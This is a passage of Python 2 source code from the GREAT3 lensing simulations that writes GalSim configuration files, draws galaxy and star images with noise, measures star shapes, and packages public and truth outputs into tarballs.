{ 'type' : 'Sequence',
'first' : subfield_min, 'last' : subfield_max,
'repeat' : self.n_epochs
},
{ 'type' : 'Sequence', 'nitems' : self.n_epochs }
]
#
# (1) First make the config files that will create the PSF images.
#
# The input field:
d['input'] = {
'catalog' : {
'file_name' : {
'type' : 'FormattedStr',
'format' : 'star_catalog-%03d-%1d.fits',
'items' : format_items
},
'dir' : self.mapper.dir
},
'dict' : {
'file_name' : {
'type' : 'FormattedStr',
'format' : 'epoch_parameters-%03d-%1d.yaml',
'items' : format_items
},
'dir' : self.mapper.dir
}
}
# The output field:
d['output'] = {
'type' : 'Fits',
'file_name' : {
'type' : 'FormattedStr',
'format' : 'starfield_image-%03d-%1d.fits',
'items' : format_items
},
'dir' : self.mapper.dir,
'nfiles' : self.n_epochs*(subfield_max - subfield_min + 1),
'noclobber' : True,
}
# The image field:
if self.variable_psf:
nx = {'type' : 'Dict', 'key' : 'psf.n_star_linear'}
ny = {'type' : 'Dict', 'key' : 'psf.n_star_linear'}
else:
nx = constants.nx_constpsf
ny = constants.ny_constpsf
d['image'] = {
'type' : 'Tiled',
'nx_tiles' : nx,
'ny_tiles' : ny,
'stamp_xsize' : constants.xsize[self.obs_type][self.multiepoch],
'stamp_ysize' : constants.ysize[self.obs_type][self.multiepoch],
'offset' : {
'type' : 'XY',
'x' : {'type' : 'Catalog', 'col' : 'xshift' },
'y' : {'type' : 'Catalog', 'col' : 'yshift' },
},
'pixel_scale' : constants.pixel_scale[self.obs_type][self.multiepoch],
'random_seed' : {
'type' : 'Sequence',
'first' : { 'type' : 'Dict', 'key' : 'noise_seed' },
'nitems' : {
'type' : 'Eval',
'str' : 'nx*ny',
'inx' : { 'type' : 'Current', 'key' : 'image.nx_tiles' },
'iny' : { 'type' : 'Current', 'key' : 'image.ny_tiles' }
}
},
'index_convention' : 'python',
}
if self.variable_psf:
# The variable psf images are rather large, so parallelize at the image level.
d['image']['nproc'] = self.nproc
else:
# The constant psf images are small enough that it is probably better to
# parallelize at the file level.
d['output']['nproc'] = self.nproc
# Delegate the basic 'psf' dict to psf_builder
d['psf'] = self.psf_builder.makeConfigDict()
if self.variable_psf:
d['psf']['signal_to_noise'] = { 'type' : 'Catalog', 'col' : 'star_snr' }
d['image']['noise'] = {
'type' : 'Gaussian',
'variance' : { 'type' : 'Dict', 'key' : 'noise.variance' }
}
# Set up the file name for the yaml config file:
experiment_letter = experiment[0]
obs_letter = obs_type[0]
shear_letter = shear_type[0]
file_name = os.path.join(self.mapper.root,
experiment_letter + obs_letter + shear_letter + '_psf.yaml')
print 'Write PSF config dict to ',file_name
import yaml
# This workaround makes sure we avoid anchors and aliases, since they make it a bit
# less readable. (The default likes to alias the format_items variable I used above.)
# c.f. http://pyyaml.org/ticket/91
Dumper = yaml.SafeDumper
Dumper.ignore_aliases = lambda self, data: True
with open(file_name,'w') as f:
yaml.dump(d, f, indent=4, Dumper=Dumper)
#
# (2) Make config files for the galaxy images
#
# Start with the above dict and make appropriate changes as necessary.
if self.variable_psf:
del d['psf']['signal_to_noise']
else:
d['image']['noise'] = {
'type' : 'Gaussian',
'variance' : { 'type' : 'Dict', 'key' : 'noise.variance' }
}
d['input']['catalog']['file_name']['format'] = 'epoch_catalog-%03d-%1d.fits'
d['output']['file_name']['format'] = 'image-%03d-%1d.fits'
nx = constants.ncols
ny = constants.nrows
d['image']['nx_tiles'] = nx
d['image']['ny_tiles'] = ny
d['image']['random_seed']['nitems'] = nx*ny
d['image']['offset'] = {
'type' : 'XY',
'x' : { 'type' : 'Eval',
'str' : 'xdither + xshift',
'fxdither' : { 'type' : 'Dict', 'key' : 'xdither' },
'fxshift' : { 'type' : 'Catalog', 'col' : 'xshift' }
},
'y' : { 'type' : 'Eval',
'str' : 'ydither + yshift',
'fydither' : { 'type' : 'Dict', 'key' : 'ydither' },
'fyshift' : { 'type' : 'Catalog', 'col' : 'yshift' }
}
}
d['image']['gsparams'] = { 'maximum_fft_size' : 10240 }
# Delegate the basic 'gal' dict to galaxy_builder
d['gal'] = self.galaxy_builder.makeConfigDict()
# Modifications to gal dict:
d['gal']['shear'] = {
'type' : 'G1G2',
'g1' : { 'type' : 'Catalog', 'col' : 'g1' },
'g2' : { 'type' : 'Catalog', 'col' : 'g2' }
}
d['gal']['magnification'] = { 'type' : 'Catalog', 'col' : 'mu' }
if not self.variable_psf:
# The galaxy images are large, so parallelize at the image level (unlike for the small
# star fields for constant PSF, for which we already had set up to parallelize at the
# file level).
d['image']['nproc'] = self.nproc
del d['output']['nproc']
if self.real_galaxy:
# Need to add the RealGalaxyCatalog to input.
d['input']['real_catalog'] = {
'dir' : os.path.abspath(self.galaxy_builder.gal_dir),
'file_name' : self.galaxy_builder.rgc_file,
'preload' : self.preload
}
file_name = os.path.join(self.mapper.root,
experiment_letter + obs_letter + shear_letter + '.yaml')
print 'Write gal config dict to ',file_name
with open(file_name,'w') as f:
yaml.dump(d, f, indent=4, Dumper=Dumper)
#
# (3) Finally, make a config file for the "StarTest" images.
#
# Easiest to just start over here.
d = {}
# The input field:
d['input'] = {
'catalog' : {
'file_name' : 'star_test_catalog.fits',
'dir' : self.mapper.dir
},
}
# The output field:
d['output'] = {
'type' : 'DataCube',
'file_name' : 'star_test_images.fits',
'dir' : self.mapper.dir,
'nimages' : self.n_epochs*(subfield_max - subfield_min + 1),
# The star_test images are all small, so parallelize at the file level.
'nproc' : self.nproc,
'noclobber' : True
}
# The image field:
d['image'] = {
# Make them 2x the normal size.
'xsize' : 2 * constants.xsize[self.obs_type][self.multiepoch],
'ysize' : 2 * constants.ysize[self.obs_type][self.multiepoch],
'pixel_scale' : constants.pixel_scale[self.obs_type][self.multiepoch],
}
# Delegate the basic 'psf' dict to psf_builder
d['psf'] = self.psf_builder.makeConfigDict(use_zero_index=False)
# Set up the file name for the yaml config file:
experiment_letter = experiment[0]
obs_letter = obs_type[0]
shear_letter = shear_type[0]
file_name = os.path.join(self.mapper.root,
experiment_letter + obs_letter + shear_letter + '_star_test.yaml')
print 'Write star test config dict to ',file_name
with open(file_name,'w') as f:
yaml.dump(d, f, indent=4, Dumper=Dumper)
def writeGalImage(self, subfield_index, epoch_index):
"""This method builds and writes the galaxy images for a given subfield and epoch to disk.
It was not used for generation of the GREAT3 simulations, since the GalSim config interface
allows for the work done here to be parallelized much more. However, for testing and
generation of small images this method can be useful.
"""
# Read in the epoch parameters and catalog.
epoch_parameters = self.mapper.read("epoch_parameters", subfield_index=subfield_index,
epoch_index=epoch_index)
epoch_catalog = self.mapper.read("epoch_catalog", epoch_parameters)
seed = epoch_parameters["noise_seed"]
# Define basic numbers like pixel scale and size of postage stamps.
pixel_scale = constants.pixel_scale[self.obs_type][self.multiepoch]
xsize = constants.xsize[self.obs_type][self.multiepoch]
ysize = constants.ysize[self.obs_type][self.multiepoch]
# Set up the full image on which to place the postage stamps.
galaxy_image = galsim.ImageF(constants.ncols * xsize, constants.nrows * ysize,
scale=pixel_scale)
galaxy_image.setOrigin(0,0)
# Define the maximum sizes for padding RealGalaxy objects with noise. This is necessary for
# 'real_galaxy' and 'full' branches.
max_xsize = xsize + 2*(constants.centroid_shift_max + constants.epoch_shift_max)
max_ysize = ysize + 2*(constants.centroid_shift_max + constants.epoch_shift_max)
# The GSObjects that are returned by the builders have scale sizes in arcsec, so our
# galsim.Pixel needs to use arcsec as well. However, some of the later manipulations
# (shifts of the centroid within the image carried out by the draw() function) will be in
# pixels.
pixel = galsim.Pixel(pixel_scale)
# We sometimes need a larger FFT than allowed by the default GSParams, so define a new
# GSParams that will allow the larger FFT.
params = galsim.GSParams(maximum_fft_size=10240)
# We'll make a cache for the PSF object, since in constant PSF branches the PSF is the same
# for all galaxies. This way, we only build the PSF object once.
cached_psf_obj = None
# Loop over the objects in the galaxy catalog for this epoch.
for record in epoch_catalog:
# Make the RNG.
rng = galsim.UniformDeviate(seed)
seed = seed + 1
# Build PSF (or take cached value if possible). If we have to build the PSF for the
# constant PSF branch, then save it to the cache.
if not self.variable_psf:
if cached_psf_obj is None:
psf = self.psf_builder.makeGalSimObject(record, epoch_parameters["psf"])
cached_psf_obj = psf
else:
psf = cached_psf_obj
else:
psf = self.psf_builder.makeGalSimObject(record, epoch_parameters["psf"])
# Build galaxy, apply the lensing shear and magnification, and convolve with the PSF.
galaxy = self.galaxy_builder.makeGalSimObject(
record, epoch_parameters["galaxy"], xsize=max_xsize, ysize=max_ysize, rng=rng)
galaxy.applyLensing(g1=record['g1'], g2=record['g2'], mu=record['mu'])
final = galsim.Convolve([psf, pixel, galaxy], gsparams=params)
# Apply both offsets: the one related to dithering between epochs (same for all objects
# in a given epoch), and the random shift of this particular object from the center of
# the postage stamp.
offset = galsim.PositionD(epoch_parameters['xdither'] + record['xshift'],
epoch_parameters['ydither'] + record['yshift'])
# Define postage stamp.
bbox = galsim.BoundsI(
xmin=int(record['xmin']), ymin=int(record['ymin']),
xmax=int(record['xmax']), ymax=int(record['ymax']),
)
stamp = galaxy_image.subImage(bbox)
# Draw into the postage stamp.
final.draw(stamp, normalization='f', dx=pixel_scale, offset=offset)
# Apply whitening if necessary (i.e., for 'real_galaxy' and 'full' branches, which use
# real HST images).
if hasattr(final, 'noise'):
current_var = final.noise.applyWhiteningTo(stamp)
else:
current_var = 0.
# The lines below are diagnostics that can be used to check that the actual S/N is
# fairly consistent with the estimated one. Turn it to True if you want to run this
# code.
if False:
# G08 is the best possible S/N estimate:
# S = sum W(x,y) I(x,y) / sum W(x,y)
# N^2 = Var(S) = sum W(x,y)^2 Var(I(x,y)) / (sum W(x,y))^2
# with W(x,y) = I(x,y), so
# S = sum I^2(x,y) / sum I(x,y)
# N^2 = noise variance * sum I^2(x,y) / (sum I(x,y))^2
# S/N = sqrt(sum I^2(x,y)) / sqrt(noise variance)
actual_sn_g08 = \
numpy.sqrt((stamp.array**2).sum() / float(epoch_parameters['noise']['variance']))
try:
res = stamp.FindAdaptiveMom()
aperture_noise = numpy.sqrt(float(epoch_parameters['noise']['variance']) * \
2.*numpy.pi*(res.moments_sigma**2))
# The number below is the flux S/N within an elliptical Gaussian filter. My
# guess is that it will be somewhere below the optimal actual_sn_g08 but not too
# horrible.
sn_ellip_gauss = res.moments_amp / aperture_noise
# We also want to estimate the S/N on the size, using an unweighted estimator
# S = Sum I(x,y) [(x-x_c)^2 + (y-y_c)^2]
# N^2 = (noise variance) * Sum [(x-x_c)^2 + (y-y_c)^2]^2
# For this, we use the centroid estimate from the adaptive moments. But we also
# have to set up the grid of x, y values for the postage stamp, according to the
# same exact convention as used for adaptive moments, which is that the center
# of the first pixel is 1. I do not like this estimator because if we make the
# postage stamp larger (with white space) then S doesn't change but N^2
# changes. So let's instead use a weighted version:
# S = Sum W(x,y) I(x,y) [(x-x_c)^2 + (y-y_c)^2] / Sum W(x,y)
# N^2 = (noise variance) * Sum W^2(x,y) [(x-x_c)^2 + (y-y_c)^2]^2 /
# (Sum W(x,y))^2
# Use W(x,y) = I(x,y),
# S = Sum I(x,y)^2 [(x-x_c)^2 + (y-y_c)^2] / Sum I(x,y)
# N^2 = (noise variance) * Sum I^2(x,y) [(x-x_c)^2 + (y-y_c)^2]^2 /
# (Sum I(x,y))^2
# S/N = Sum I(x,y)^2 [(x-x_c)^2 + (y-y_c)^2] /
# sqrt[(noise variance) * Sum I^2(x,y) [(x-x_c)^2 + (y-y_c)^2]^2]
if stamp.array.shape[0] != stamp.array.shape[1]:
raise RuntimeError
min = 1.
max = float(stamp.array.shape[0]+1)
x_pix, y_pix = numpy.meshgrid(numpy.arange(min, max, 1.),
numpy.arange(min, max, 1.))
dx_pix = x_pix - (res.moments_centroid.x - (res.image_bounds.xmin-1))
dy_pix = y_pix - (res.moments_centroid.y - (res.image_bounds.ymin-1))
sn_size = numpy.sum(stamp.array**2 * (dx_pix**2 + dy_pix**2)) / \
numpy.sqrt(float(epoch_parameters['noise']['variance']) * \
numpy.sum(stamp.array**2 * (dx_pix**2 + dy_pix**2)**2))
except:
sn_ellip_gauss = -10.
sn_size = -10.
print 'SN: ', record['gal_sn'], actual_sn_g08, sn_ellip_gauss, sn_size, \
record['bulge_n'], record['bulge_hlr'], record['bulge_flux']
# Now, actually add the noise to this postage stamp.
self.noise_builder.addNoise(rng, epoch_parameters['noise'], stamp, current_var)
# Write the entire big image to the appropriate file, as determined by the mapper.
self.mapper.write(galaxy_image, "image", epoch_parameters)
def writePSFImage(self, subfield_index, epoch_index):
"""This method builds and writes the star field images for a particular subfield and epoch
to disk. It was not used for generation of the GREAT3 simulations, since the GalSim config
interface allows for the work done here to be parallelized much more. However, for testing
and generation of small images this method can be useful.
"""
# Read in the epoch parameters and star catalog.
epoch_parameters = self.mapper.read("epoch_parameters", subfield_index=subfield_index,
epoch_index=epoch_index)
star_catalog = self.mapper.read("star_catalog", epoch_parameters)
seed = epoch_parameters["noise_seed"]
# Define basic numbers like pixel scale and size of postage stamps.
pixel_scale = constants.pixel_scale[self.obs_type][self.multiepoch]
xsize = constants.xsize[self.obs_type][self.multiepoch]
ysize = constants.ysize[self.obs_type][self.multiepoch]
# Make a galsim.Pixel representing the top-hat pixel.
pixel = galsim.Pixel(pixel_scale)
# Set up the image for the star field. Its size depends on whether this is a constant PSF
# or variable PSF branch.
if self.variable_psf:
n_star_linear = epoch_parameters["psf"]["n_star_linear"]
star_image = galsim.ImageF(n_star_linear * xsize,
n_star_linear * ysize,
scale=pixel_scale)
else:
star_image = galsim.ImageF(constants.nx_constpsf * xsize,
constants.ny_constpsf * ysize,
scale=pixel_scale)
star_image.setOrigin(0, 0)
# Set up a cache for the galsim.GSObject corresponding to this star. This is useful for
# constant PSF branches, for which the star is the same in each star image (just shifted).
cached_psf_obj = None
for record in star_catalog:
rng = galsim.UniformDeviate(seed)
seed = seed + 1
# Define the bounds of this postage stamp.
bbox = galsim.BoundsI(
xmin=int(record['xmin']), ymin=int(record['ymin']),
xmax=int(record['xmax']), ymax=int(record['ymax']),
)
stamp = star_image.subImage(bbox)
# Build PSF (or take cached value if possible).
if not self.variable_psf:
if cached_psf_obj is None:
psf = self.psf_builder.makeGalSimObject(record, epoch_parameters["psf"])
cached_psf_obj = psf
else:
psf = cached_psf_obj
else:
psf = self.psf_builder.makeGalSimObject(record, epoch_parameters["psf"])
# Convolve with the pixel response.
final = galsim.Convolve([psf, pixel])
offset = galsim.PositionD(record['xshift'],record['yshift'])
# Draw into the postage stamp, including the centroid shift with the draw() method
# (rather than actually shifting the GSObject). The draw() `offset` keyword takes pixel
# units, rather than arcsec.
final.draw(stamp, normalization='f', offset=offset)
# Only the variable PSF branches have noisy star fields, so add noise in that case.
if self.variable_psf:
self.noise_builder.addStarImageNoise(
rng, epoch_parameters['noise'], record['star_snr'], stamp)
# Write the entire star field image to file.
self.mapper.write(star_image, "starfield_image", epoch_parameters)
def writeStarParameters(self, subfield_index, epoch_index):
"""This method writes out a dict for the PSF shapes needed for metric calculation. The
metric calculation for constant shear requires us to know the direction of PSF anisotropy,
so we measure some of the star shapes from the star images. (We cannot do this based on the
catalogs since the stars are the composition of an aberrated optical PSF and an atmospheric
PSF, for which the composite shape is not obvious.)
"""
# Only do this for constant shear, not variable shear! The star shapes are needed to create
# the metric for the constant shear branch fits to (m, c) values.
if self.shear_type == "variable":
return
# Read in epoch parameters and a star catalog.
epoch_parameters = self.mapper.read("epoch_parameters", subfield_index=subfield_index,
epoch_index=epoch_index)
star_catalog = self.mapper.read("star_catalog", epoch_parameters)
seed = epoch_parameters["noise_seed"]
# Read in the star image.
star_image = self.mapper.read("starfield_image", epoch_parameters)
starshape_parameters = None
if not self.variable_psf:
for record in star_catalog:
bbox = galsim.BoundsI(
xmin=int(record['xmin']), ymin=int(record['ymin']),
xmax=int(record['xmax']), ymax=int(record['ymax']),
)
stamp = star_image.subImage(bbox)
if starshape_parameters is None:
try:
shape_res = galsim.hsm.FindAdaptiveMom(stamp)
star_g1 = shape_res.observed_shape.g1
star_g2 = shape_res.observed_shape.g2
except:
star_g1 = -10.
star_g2 = -10.
starshape_parameters = {"psf_g1": star_g1,
"psf_g2": star_g2,
"subfield_index": subfield_index,
"epoch_index": epoch_index}
# For variable PSF, choose a random subset of the stars to measure. We can just use the
# first N in the catalog, since they correspond to completely random positions in the field.
if self.variable_psf:
# We will use 1% of the stars. Use ceil() to make sure that we don't end up with zero
# for test runs with few stars.
n_star_use = int(numpy.ceil(0.01*len(star_catalog)))
sub_catalog = star_catalog[0:n_star_use]
for record in sub_catalog:
bbox = galsim.BoundsI(
xmin=int(record['xmin']), ymin=int(record['ymin']),
xmax=int(record['xmax']), ymax=int(record['ymax']),
)
stamp = star_image.subImage(bbox)
try:
shape_res = galsim.hsm.FindAdaptiveMom(stamp)
star_g1 = shape_res.observed_shape.g1
star_g2 = shape_res.observed_shape.g2
if starshape_parameters is None:
starshape_parameters = {"psf_g1": star_g1,
"psf_g2": star_g2,
"subfield_index": subfield_index,
"epoch_index": epoch_index,
"n_star_actual": 1}
else:
starshape_parameters["psf_g1"] += star_g1
starshape_parameters["psf_g2"] += star_g2
starshape_parameters["n_star_actual"] += 1
except:
pass
# Now normalize average shapes.
if starshape_parameters != None:
if starshape_parameters["n_star_actual"] > 1:
starshape_parameters["psf_g1"] /= starshape_parameters["n_star_actual"]
starshape_parameters["psf_g2"] /= starshape_parameters["n_star_actual"]
else:
starshape_parameters = {"psf_g1": -10.,
"psf_g2": -10.,
"subfield_index": subfield_index,
"epoch_index": epoch_index,
"n_star_actual": 0}
# Write the results to the appropriate file using the mapper.
self.mapper.write(starshape_parameters, "starshape_parameters", starshape_parameters)
def packagePublic(self, subfield_min, subfield_max):
"""This method packages up the public outputs (no truth values) into a single big tarfile
for this branch. We can choose to use a subset of the subfields if we wish."""
import shutil
import tarfile
# First, do some basic calculations related to the deep fields. If they are included in the
# range of requested subfields, i.e., (subfield_min, ..., subfield_max), then things are
# slightly more complicated: we have to choose which of those subfields to actually package
# up, since we only want the deep fields to be a certain fraction of the field overall.
# Also, we change the name on output, because we want to be completely clear that these are
# not typical images.
n_deep_subfields = constants.n_deep_subfields
n_reg_subfields = constants.n_subfields - n_deep_subfields
n_deep_to_output = int(round(constants.deep_frac * n_reg_subfields))
max_reg_subfield = n_reg_subfields - 1
min_deep_subfield = n_reg_subfields
max_deep_subfield = n_reg_subfields + n_deep_to_output - 1
if subfield_max > max_deep_subfield:
import warnings
deep_warning = "Requested range of subfields includes extra deep fields. Adjusting."
warnings.warn(deep_warning)
subfield_max = max_deep_subfield
# Define the output directory (and create if necessary). Use a mapper for this.
public_mapper = great3sims.mapper.Mapper(self.public_dir, self.experiment, self.obs_type,
self.shear_type)
# Also define an absolute path to the root directory structure, because we're going to be
# moving around, so self.mapper (which uses relative path) won't work.
root_rel_mapper = great3sims.mapper.Mapper(os.path.abspath(self.mapper.root),
self.experiment, self.obs_type, self.shear_type)
# Zipping / tarring. Open tarfile at the start, then add the files as they are created.
tarfile_name = os.path.join(self.public_dir,
self.experiment+'-'+self.obs_type+'-'+self.shear_type+'.tar.gz')
tar = tarfile.open(tarfile_name, "w:gz")
# Now we want to move into public_dir. The reason for this is that we don't want the files
# in public_dir that go into the tarfile to have public_dir/ at the start of their paths,
# otherwise when untarred they end up in public_dir/public_dir/... which is kind of silly.
saved_path = os.getcwd()
os.chdir(self.public_dir)
sub_mapper = great3sims.mapper.Mapper('.', self.experiment, self.obs_type, self.shear_type)
for subfield_index in xrange(subfield_min, subfield_max+1):
# Loop over galaxy and star field images for the defined set of subfields and epochs,
# and copy over without modification of any sort.
tmp_dict = {"subfield_index" : subfield_index}
if subfield_index > max_reg_subfield:
tmp_dict["deep_subfield_index"] = subfield_index - n_reg_subfields
for epoch_index in xrange(self.n_epochs):
tmp_dict["epoch_index"] = epoch_index
if subfield_index <= max_reg_subfield:
outfile = root_rel_mapper.copyTo(sub_mapper, 'image', tmp_dict)
tar.add(outfile)
outfile = root_rel_mapper.copyTo(sub_mapper, 'starfield_image', tmp_dict)
tar.add(outfile)
else:
outfile = root_rel_mapper.copyTo(sub_mapper, 'image', tmp_dict,
new_template = "deep_image-%(deep_subfield_index)03d-%(epoch_index)1d.fits")
tar.add(outfile)
outfile = root_rel_mapper.copyTo(sub_mapper, 'starfield_image', tmp_dict,
new_template = \
"deep_starfield_image-%(deep_subfield_index)03d-%(epoch_index)1d.fits")
tar.add(outfile)
# Loop over galaxy catalogs for each subfield, and copy only the information we want to
# be public. For now, let's stick with 'x', 'y', 'ID'. We could consider giving the
# information on position within the field, but for now, that's encoded in ID rather
# than being given explicitly in the catalog. Also, the subfield offset will be output
# separately, so that can be used with x / y to get positions in degrees, assuming the
# user understands how to go from x / y to degrees in a single subfield.
# However... if this is a variable_psf branch, then we want to explicitly output
# information about the location within the field, the tile, and location within the
# tile.
# Unfortunately this is in the epoch_catalog files rather than subfield_catalog
# ("unfortunately" because it's the same for all epochs and means we have to read in
# multiple files) so in that case we have to read in that info as well, and merge the
# bits of info together. Bah.
gal_use_cols = [('x', int), ('y', int), ('ID', int)]
if self.variable_psf:
gal_epoch_use_cols = [('x_tile_index', int), ('y_tile_index', int),
('tile_x_pos_deg', float), ('tile_y_pos_deg', float),
('x_field_true_deg', float), ('y_field_true_deg', float)]
if subfield_index <= max_reg_subfield:
tmp_dict = {"subfield_index" : subfield_index}
if self.variable_psf:
tmp_dict["epoch_index"] = 0
outfile = root_rel_mapper.mergeSub(sub_mapper, 'subfield_catalog',
'epoch_catalog', tmp_dict, gal_use_cols,
gal_epoch_use_cols,
new_template =
"galaxy_catalog-%(subfield_index)03d")
else:
outfile = root_rel_mapper.copySub(sub_mapper, 'subfield_catalog', tmp_dict,
gal_use_cols,
new_template =
"galaxy_catalog-%(subfield_index)03d")
else:
tmp_dict["deep_subfield_index"] = subfield_index - n_reg_subfields
if self.variable_psf:
tmp_dict["epoch_index"] = 0
outfile = root_rel_mapper.mergeSub(sub_mapper, 'subfield_catalog',
'epoch_catalog', tmp_dict, gal_use_cols,
gal_epoch_use_cols,
new_template =
"deep_galaxy_catalog-%(subfield_index)03d")
else:
# If this line is not in an 'else' statement, then it will simply overwrite the
# correct FITS catalog with one that lacks some important columns that are
# necessary for variable PSF experiments! Oops. And then those incorrect
# catalogs will be converted to the text versions, which will also be wrong.
outfile = root_rel_mapper.copySub(sub_mapper, 'subfield_catalog', tmp_dict,
gal_use_cols,
new_template =
"deep_galaxy_catalog-%(deep_subfield_index)03d")
tar.add(outfile)
# ... and also copy to text file that gets added to the tarball.
outfile_no_ext = os.path.splitext(outfile)[0]
great3sims.mapper.fitsToTextCatalog(outfile_no_ext)
tar.add(outfile_no_ext + '.txt')
# Loop over star catalogs, and copy only the information that we want to be public. For
# constant PSF branches, this is just 'x' and 'y'. For variable PSF branches, we want
# the same additional info as was given for the galaxies re: position within the field
# and tiles.
if self.variable_psf:
star_use_cols = [('x', int), ('y', int), ('x_tile_index', int),
('y_tile_index', int), ('tile_x_pos_deg', float),
('tile_y_pos_deg', float), ('x_field_true_deg', float),
('y_field_true_deg', float)]
else:
star_use_cols = [('x', int), ('y', int)]
if subfield_index <= max_reg_subfield:
tmp_dict = {"subfield_index" : subfield_index, "epoch_index" : 0}
outfile = root_rel_mapper.copySub(
sub_mapper, 'star_catalog', tmp_dict, star_use_cols,
new_template="star_catalog-%(subfield_index)03d")
else:
tmp_dict["deep_subfield_index"] = subfield_index - n_reg_subfields
tmp_dict["epoch_index"] = 0
outfile = root_rel_mapper.copySub(
sub_mapper, 'star_catalog', tmp_dict, star_use_cols,
new_template="deep_star_catalog-%(deep_subfield_index)03d")
# ... and also copy to text file that gets added to the tarball.
outfile_no_ext = os.path.splitext(outfile)[0]
great3sims.mapper.fitsToTextCatalog(outfile_no_ext)
tar.add(outfile)
tar.add(outfile_no_ext+'.txt')
# We can also give some overall information about subfield offsets. For now, we use the
# subfield_parameters file, extract subfield_offset [which currently is in units of
# separation between galaxies in the grid], convert that to degrees, and output that as
# a yaml file and a text file. This is redundant, but since the files are tiny it
# doesn't seem like a big issue to support both formats.
template, reader, writer = root_rel_mapper.mappings['subfield_parameters']
in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
subfield_params = great3sims.mapper.readDict(in_path)
mult_val = constants.image_size_deg / constants.nrows
offset_parameters = {
"offset_deg_x": mult_val * subfield_params['subfield_offset'][0],
"offset_deg_y": mult_val * subfield_params['subfield_offset'][1]
}
if subfield_index <= max_reg_subfield:
template = "subfield_offset-%(subfield_index)03d"
else:
template = "deep_subfield_offset-%(deep_subfield_index)03d"
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(offset_parameters, outfile)
great3sims.mapper.writeDict(offset_parameters, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
# Finally, for each epoch, we need to give information about the size of the dithering
# with respect to the first epoch. For the sake of having a consistent data format for
# all branches, we include this even for single epoch branches (for which the dithers
# are all 0 since each image IS the first and only epoch). We extract the xdither and
# ydither from the epoch_parameters, and write a file for each subfield and epoch.
# These files are tiny, so let's write one for each subfield and epoch, in both yaml and
# txt format.
for epoch_index in xrange(self.n_epochs):
tmp_dict["epoch_index"] = epoch_index
template, reader, writer = root_rel_mapper.mappings['epoch_parameters']
in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
epoch_params = great3sims.mapper.readDict(in_path)
dither_parameters = {
"xdither_pixels": epoch_params['xdither'],
"ydither_pixels": epoch_params['ydither']
}
if subfield_index <= max_reg_subfield:
template = "epoch_dither-%(subfield_index)03d-%(epoch_index)1d"
else:
template = "deep_epoch_dither-%(deep_subfield_index)03d-%(epoch_index)1d"
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(dither_parameters, outfile)
great3sims.mapper.writeDict(dither_parameters, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
# Close the tarfile. Now that we're done with it, we can go back to our original working
# directory.
tar.close()
os.chdir(saved_path)
# Delete the files / dirs, just keep the tarfiles.
shutil.rmtree(public_mapper.full_dir)
def packageTruth(self, subfield_min, subfield_max):
"""This method packages up the true shear values and PSF ellipticities for metric
calculations.
"""
import shutil
import tarfile
# First, do some basic calculations related to the deep fields. If they are included in the
# range of requested subfields, i.e., (subfield_min, ..., subfield_max), then emit a warning
# that we are excluding them because they are not used for metric evaluation.
n_deep_subfields = constants.n_deep_subfields
n_reg_subfields = constants.n_subfields - n_deep_subfields
if subfield_max > n_reg_subfields - 1:
import warnings
deep_warning = "Requested range of subfields includes deep fields. Adjusting."
warnings.warn(deep_warning)
subfield_max = n_reg_subfields - 1
# Define the output directory (and create if necessary). Use a mapper for this.
truth_mapper = great3sims.mapper.Mapper(self.truth_dir, self.experiment, self.obs_type,
self.shear_type)
# Also define an absolute path to the root directory structure, because we're going to be
# moving around, so self.mapper (which uses relative path) won't work.
root_rel_mapper = great3sims.mapper.Mapper(os.path.abspath(self.mapper.root),
self.experiment, self.obs_type, self.shear_type)
# Zipping / tarring. Open tarfile at the start, then add the files as they are created.
tarfile_name = os.path.join(self.truth_dir,
self.experiment+'-'+self.obs_type+'-'+self.shear_type+'.tar.gz')
tar = tarfile.open(tarfile_name, "w:gz")
# Now we want to move into truth_dir. The reason for this is that we don't want the files
# in truth_dir that go into the tarfile to have truth_dir/ at the start of their paths,
# otherwise when untarred they end up in truth_dir/truth_dir/... which is kind of silly.
saved_path = os.getcwd()
os.chdir(self.truth_dir)
sub_mapper = great3sims.mapper.Mapper('.', self.experiment, self.obs_type, self.shear_type)
# First, we copy over the star test catalog and images.
# Make the old, new target filenames for the star test catalog:
template, reader, writer = root_rel_mapper.mappings['star_test_catalog']
infile = os.path.join(root_rel_mapper.full_dir, template % {}) + '.fits'
outfile = os.path.join(sub_mapper.full_dir, template % {}) + '.fits'
shutil.copy2(infile, outfile)
tar.add(outfile)
template, reader, writer = root_rel_mapper.mappings['star_test_images']
infile = os.path.join(root_rel_mapper.full_dir, template % {}) + '.fits'
outfile = os.path.join(sub_mapper.full_dir, template % {}) + '.fits'
if os.path.exists(infile):
shutil.copy2(infile, outfile)
tar.add(outfile)
# Now do all the per-subfield stuff.
for subfield_index in xrange(subfield_min, subfield_max+1):
tmp_dict = {"subfield_index" : subfield_index}
# If variable shear, then loop over subfield catalogs and copy over just the ID and the
# per-galaxy reduced shear.
if self.shear_type == 'variable':
use_cols = [('ID', int), ('g1', float), ('g2', float),
('g1_intrinsic', float), ('g2_intrinsic', float)]
outfile = root_rel_mapper.copySub(sub_mapper, 'subfield_catalog', tmp_dict,
use_cols,
new_template =
"galaxy_catalog-%(subfield_index)03d")
tar.add(outfile)
# We can also give some overall information about subfield offsets. This is
# necessary for variable shear sims in order to convert the positions in each
# subfield to a position in the field. For now, we use the subfield_parameters
# file, extract subfield_offset [which currently is in units of separation between
# galaxies in the grid], convert that to degrees, and output that as a yaml file and
# a text file. This is redundant, but since the files are tiny it doesn't seem like
# a big issue to support both formats.
template, reader, writer = root_rel_mapper.mappings['subfield_parameters']
in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
subfield_params = great3sims.mapper.readDict(in_path)
mult_val = constants.image_size_deg / constants.nrows
offset_parameters = {
"offset_deg_x": mult_val * subfield_params['subfield_offset'][0],
"offset_deg_y": mult_val * subfield_params['subfield_offset'][1]
}
template = "subfield_offset-%(subfield_index)03d"
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(offset_parameters, outfile)
great3sims.mapper.writeDict(offset_parameters, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
else:
# If constant shear, then take the subfield g1, g2 and write as yaml/text.
template, reader, writer = root_rel_mapper.mappings['subfield_parameters']
